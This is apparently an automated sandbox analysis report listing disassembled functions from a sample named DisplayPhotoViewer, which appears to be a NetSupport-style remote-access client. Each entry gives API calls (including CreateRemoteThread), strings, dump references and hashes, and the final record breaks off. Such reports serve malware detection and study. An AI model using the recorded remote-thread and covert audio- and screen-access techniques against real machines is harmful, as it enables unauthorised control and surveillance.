                                                                                                    Function 1111D630 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 110libraryloaderthreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32,00000001,00000000,?,?,?,110FFA35,00000000,000000FF), ref: 1111D64A
                                                                                                    • GetCurrentProcess.KERNEL32(FFFFFFFF,001F0FFF,00000000,00000000,?,?,110FFA35,00000000,000000FF), ref: 1111D666
                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000,?,?,110FFA35,00000000,000000FF), ref: 1111D66D
                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,110FFA35,00000000,000000FF), ref: 1111D670
                                                                                                    • GetExitCodeProcess.KERNEL32(FFFFFFFF,?), ref: 1111D689
                                                                                                    • GetProcAddress.KERNEL32(00000000,ExitProcess), ref: 1111D6A2
                                                                                                    • CreateRemoteThread.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,00000000,?), ref: 1111D6C1
                                                                                                    • GetLastError.KERNEL32 ref: 1111D6CD
                                                                                                    • TerminateProcess.KERNEL32(000000FF,00000000), ref: 1111D6D8
                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,?,?,110FFA35), ref: 1111D73F
                                                                                                    • SetLastError.KERNEL32(0000042B,?,?,110FFA35), ref: 1111D74D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$Handle$CurrentErrorLast$AddressCloseCodeCreateDuplicateExitModuleProcRemoteTerminateThread
                                                                                                    • String ID: ExitProcess$Kernel32
                                                                                                    • API String ID: 109174691-3456457508
                                                                                                    • Opcode ID: 23a8d51ea345469b452a98c265589ef130fb499740f9717dd2427de7f8a4f295
                                                                                                    • Instruction ID: 65218dde5bd42fdcb51d43cf6386a31a57d5f45fbc13f4cb54451d2089f49792
                                                                                                    • Opcode Fuzzy Hash: 23a8d51ea345469b452a98c265589ef130fb499740f9717dd2427de7f8a4f295
                                                                                                    • Instruction Fuzzy Hash: 5531B376E00265ABCF11EFA5D88CA9EFB78EF44764F008069FC14A7248D7749A00CBA0
                                                                                                    Function 1106D140 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 322sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110840C0: IsWindow.USER32(?), ref: 110840DF
                                                                                                      • Part of subcall function 110840C0: IsWindow.USER32(?), ref: 110840ED
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 1106D18B
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • CloseHandle.KERNEL32(00000000,1106CFF0,00000001,00000000), ref: 1106D1FA
                                                                                                    • _memset.LIBCMT ref: 1106D242
                                                                                                    • GetTickCount.KERNEL32 ref: 1106D253
                                                                                                    • GetTickCount.KERNEL32 ref: 1106D25C
                                                                                                    • GetTickCount.KERNEL32 ref: 1106D275
                                                                                                    • Sleep.KERNEL32(?,?,?,00000002), ref: 1106D2B8
                                                                                                    • Sleep.KERNEL32(0000000A,?,?,00000002), ref: 1106D30D
                                                                                                    • GetTickCount.KERNEL32 ref: 1106D458
                                                                                                      • Part of subcall function 111078A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110859D,00000000,00000001,?,?,?,?,?,1102F5F3), ref: 111078BE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$Window$Sleep_memset$CloseCreateEnableEventHandle_mallocwsprintf
                                                                                                    • String ID: $gfff
                                                                                                    • API String ID: 891474222-257315895
                                                                                                    • Opcode ID: 73106c00dc76d1d4257eeea954cf1a6c419609cae60909211727e184f13de2c6
                                                                                                    • Instruction ID: 3ce1ca468c266464a933b74fe3aac4e58979fa80f7d1dee04884b1f6784d7fc2
                                                                                                    • Opcode Fuzzy Hash: 73106c00dc76d1d4257eeea954cf1a6c419609cae60909211727e184f13de2c6
                                                                                                    • Instruction Fuzzy Hash: 62C1BA70B002159FEB24DF24CC91BAEB7B5FF88304F1085A8E9469B384EB74E981CB51
                                                                                                    Function 11003580 Relevance: 27.2, APIs: 18, Instructions: 171COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000004), ref: 110035C1
                                                                                                      • Part of subcall function 111388D0: SetBkColor.GDI32(?,00000000), ref: 111388E4
                                                                                                      • Part of subcall function 111388D0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111388F9
                                                                                                      • Part of subcall function 111388D0: SetBkColor.GDI32(?,00000000), ref: 11138901
                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 110035D5
                                                                                                    • GetStockObject.GDI32(00000007), ref: 110035E0
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 110035EB
                                                                                                    • SelectObject.GDI32(?,?), ref: 110035FC
                                                                                                    • GetSysColor.USER32(00000010), ref: 1100360C
                                                                                                    • GetSysColor.USER32(00000010), ref: 11003623
                                                                                                    • GetSysColor.USER32(00000014), ref: 1100363A
                                                                                                    • GetSysColor.USER32(00000014), ref: 11003651
                                                                                                    • GetSysColor.USER32(00000014), ref: 1100366E
                                                                                                    • GetSysColor.USER32(00000014), ref: 11003685
                                                                                                    • GetSysColor.USER32(00000010), ref: 1100369C
                                                                                                    • GetSysColor.USER32(00000010), ref: 110036B3
                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 110036D0
                                                                                                    • Rectangle.GDI32(?,?,00000001,?,?), ref: 110036EA
                                                                                                    • SelectObject.GDI32(?,?), ref: 110036FE
                                                                                                    • SelectObject.GDI32(?,?), ref: 11003708
                                                                                                    • DeleteObject.GDI32(?), ref: 1100370E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                                    • String ID:
                                                                                                    • API String ID: 3698065672-0
                                                                                                    • Opcode ID: 7ed66bb8cdcb0bb537ec076eaab7952cee7355fcfb9d796600d45c3dd963f3bf
                                                                                                    • Instruction ID: 4d4e95ecd8771a61e9dba8b307a509cdf54daa3739b90ba69e486c56b986f4b8
                                                                                                    • Opcode Fuzzy Hash: 7ed66bb8cdcb0bb537ec076eaab7952cee7355fcfb9d796600d45c3dd963f3bf
                                                                                                    • Instruction Fuzzy Hash: 8E515EB5900209AFD710DFA5CC85EBFF3BCEB98714F104A18FA11A7285D671BA45CBA1
                                                                                                    Function 11129220 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 241COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf
                                                                                                    • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                                                    • API String ID: 2111968516-1286714176
                                                                                                    • Opcode ID: 7848c33d2f1dd5eee98893fe19fa417280a422784794dd45225a42f1a563ba5e
                                                                                                    • Instruction ID: 80bb102356f4f6002972538837eb82f374be09b4d8d51cf3bacdfe9d44a6ccd8
                                                                                                    • Opcode Fuzzy Hash: 7848c33d2f1dd5eee98893fe19fa417280a422784794dd45225a42f1a563ba5e
                                                                                                    • Instruction Fuzzy Hash: 31910975A4026D9FD721CBA8CDC4FDAF3B5EF48744F6041A5E90597280EB70AA41CF61
                                                                                                    Function 1100B290 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • _malloc.LIBCMT ref: 1100B2E6
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                      • Part of subcall function 1100ABC0: EnterCriticalSection.KERNEL32(000000FF,218EC38C,?,00000000,00000000), ref: 1100AC04
                                                                                                      • Part of subcall function 1100ABC0: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AC22
                                                                                                      • Part of subcall function 1100ABC0: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AC6E
                                                                                                      • Part of subcall function 1100ABC0: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100ACB5
                                                                                                      • Part of subcall function 1100ABC0: CloseHandle.KERNEL32(00000000), ref: 1100ACBC
                                                                                                      • Part of subcall function 1100ABC0: _free.LIBCMT ref: 1100ACD3
                                                                                                      • Part of subcall function 1100ABC0: FreeLibrary.KERNEL32(?), ref: 1100ACEB
                                                                                                      • Part of subcall function 1100ABC0: LeaveCriticalSection.KERNEL32(?), ref: 1100ACF5
                                                                                                    • EnterCriticalSection.KERNEL32(1100CA3A,Audio,DisableSounds,00000000,00000000,218EC38C,?,1100CA2A,00000000,?,1100CA2A,?), ref: 1100B31B
                                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA2A,?), ref: 1100B338
                                                                                                    • _calloc.LIBCMT ref: 1100B369
                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA2A,?), ref: 1100B38F
                                                                                                    • LeaveCriticalSection.KERNEL32(1100CA3A,?,1100CA2A,?), ref: 1100B3C9
                                                                                                    • LeaveCriticalSection.KERNEL32(1100CA2A,?,?,1100CA2A,?), ref: 1100B3EE
                                                                                                    Strings
                                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B453
                                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B473
                                                                                                    • \\.\NSAudioFilter, xrefs: 1100B330
                                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B49C
                                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B443
                                                                                                    • DisableSounds, xrefs: 1100B2C2
                                                                                                    • InitCaptureSounds NT6, xrefs: 1100B40E
                                                                                                    • Audio, xrefs: 1100B2C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                    • API String ID: 1843377891-2362500394
                                                                                                    • Opcode ID: ac966c748d7357f23b44cb81e352eff68a997ee5eaa533ed2dce7f2f83584676
                                                                                                    • Instruction ID: b1e1e97fae144edd4203a9076ad24e71a6d414591b72f210e114de8874250fb4
                                                                                                    • Opcode Fuzzy Hash: ac966c748d7357f23b44cb81e352eff68a997ee5eaa533ed2dce7f2f83584676
                                                                                                    • Instruction Fuzzy Hash: 5A51D7B5E04A46AFE700CF65EC80B9EFBA4FF05359F10463AE91993240EB7075508BA1
                                                                                                    Function 1111D370 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 240comwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 1111D3AA
                                                                                                    • SendMessageA.USER32(?,0000043C,00000000,?), ref: 1111D3C1
                                                                                                    • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1111D3F0
                                                                                                    • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1111D426
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • OleCreateStaticFromData.OLE32(00000000,111B443C,00000002,?,?,?,?), ref: 1111D532
                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 1111D548
                                                                                                    • _memset.LIBCMT ref: 1111D555
                                                                                                    • CoUninitialize.OLE32 ref: 1111D609
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$BytesLockMessage$ContainedDataDocfileErrorExitFromGlobalInitializeLastObjectProcessSendStaticUninitialize_memsetwsprintf
                                                                                                    • String ID: ..\CTL32\RichInsert.cpp$8$pLockBytes$pOleClientSite$pRichEditOle$pStorage
                                                                                                    • API String ID: 1820880743-4036218486
                                                                                                    • Opcode ID: 7e52a97ff0e08f483bba17ff41f8c181077b7cddba0fd5bdc32626615e8818da
                                                                                                    • Instruction ID: f3ba1b7368a252f8364fa3b899f35c55636661d1b37cf4e092e9675286da1571
                                                                                                    • Opcode Fuzzy Hash: 7e52a97ff0e08f483bba17ff41f8c181077b7cddba0fd5bdc32626615e8818da
                                                                                                    • Instruction Fuzzy Hash: A79118B5E002599FDB50DFA8DC84A9EFBB9FF88308F508569E519AB344DB30A941CF50
                                                                                                    Function 1102F710 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,218EC38C), ref: 1102F74A
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • EnumWindows.USER32(Function_0002E890,00000001), ref: 1102F822
                                                                                                    • EnumWindows.USER32(Function_0002E890,00000000), ref: 1102F87C
                                                                                                    • Sleep.KERNEL32(00000014), ref: 1102F88C
                                                                                                    • Sleep.KERNEL32(?), ref: 1102F8C3
                                                                                                      • Part of subcall function 11026B00: _memset.LIBCMT ref: 11026B35
                                                                                                      • Part of subcall function 11026B00: wsprintfA.USER32 ref: 11026B6A
                                                                                                      • Part of subcall function 11026B00: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11026BAF
                                                                                                      • Part of subcall function 11026B00: GetExitCodeProcess.KERNEL32(?,?), ref: 11026BC3
                                                                                                      • Part of subcall function 11026B00: CloseHandle.KERNEL32(?,?), ref: 11026BF5
                                                                                                      • Part of subcall function 11026B00: CloseHandle.KERNEL32(?), ref: 11026BFE
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 1102F8DB
                                                                                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 1102F997
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                                    • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                                    • API String ID: 3887438110-1852639040
                                                                                                    • Opcode ID: 5be34af4ecbbee7d3d8fb2baa3f4bfaac64e2fc434bd065debb32d9bdfe86864
                                                                                                    • Instruction ID: 474caed494a3e01976f2f12646d54c45569c71b6724df196c63e2f002d4d9618
                                                                                                    • Opcode Fuzzy Hash: 5be34af4ecbbee7d3d8fb2baa3f4bfaac64e2fc434bd065debb32d9bdfe86864
                                                                                                    • Instruction Fuzzy Hash: BA91BFB5E0022A9BDB14CF64CC80BAEF7E5AF48748F5441ADD94997340EB70AE41CB92
                                                                                                    Function 11133110 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 144registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(11000000,NSMDisplayImageClass,?), ref: 1113314D
                                                                                                    • GetStockObject.GDI32(00000005), ref: 11133189
                                                                                                    • RegisterClassA.USER32(?), ref: 111331A8
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDisplayImageClass), ref: 111331D1
                                                                                                    • CreateWindowExA.USER32(00000080,NSMDisplayImageClass,LockImage,80000000,?,?,?,00000000,00000000,00000000,11000000,00000000), ref: 11133260
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,00000000), ref: 11133289
                                                                                                    • BringWindowToTop.USER32(00000000), ref: 11133290
                                                                                                    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,00000000), ref: 111332AD
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 111332B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Class$AtomBringCreateErrorExitForegroundGlobalInfoLastMessageObjectProcessRegisterShowStockwsprintf
                                                                                                    • String ID: LockImage$NSMDisplayImageClass$UI.CPP$hWnd
                                                                                                    • API String ID: 2874459511-2435945906
                                                                                                    • Opcode ID: 14f5e18bd7484c0c3277a19061c1c8775e95c2a43ed54eced4202a8697d867af
                                                                                                    • Instruction ID: 8ae18fdab4263ecfa175705d9016d1ab0ac37dc4f0c8cee6f90c9ab3c6ce5bb2
                                                                                                    • Opcode Fuzzy Hash: 14f5e18bd7484c0c3277a19061c1c8775e95c2a43ed54eced4202a8697d867af
